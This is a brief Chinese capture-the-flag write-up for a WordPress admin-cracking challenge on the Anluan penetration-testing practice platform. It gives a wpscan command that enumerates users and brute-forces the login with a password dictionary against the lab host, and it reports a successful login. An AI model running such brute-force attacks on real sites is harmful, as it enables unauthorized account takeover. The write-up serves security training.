安鸾渗透实战平台—— wordpress后台破解 (400分)

漏洞环境

安鸾渗透实战平台
kali(wpscan)

题目信息

安鸾渗透实战平台—— wordpress后台破解 (400分)_第1张图片

下载密码文件到kali直接调用wpscan

wpscan --url http://118.190.133.35:8090 / -e u -P /home/kali/Desktop/dict.txt

程序会自动识别出用户名,并爆破密码

安鸾渗透实战平台—— wordpress后台破解 (400分)_第2张图片

成功登录

安鸾渗透实战平台—— wordpress后台破解 (400分)_第3张图片

你可能感兴趣的:(安鸾渗透实战平台,安全,web安全)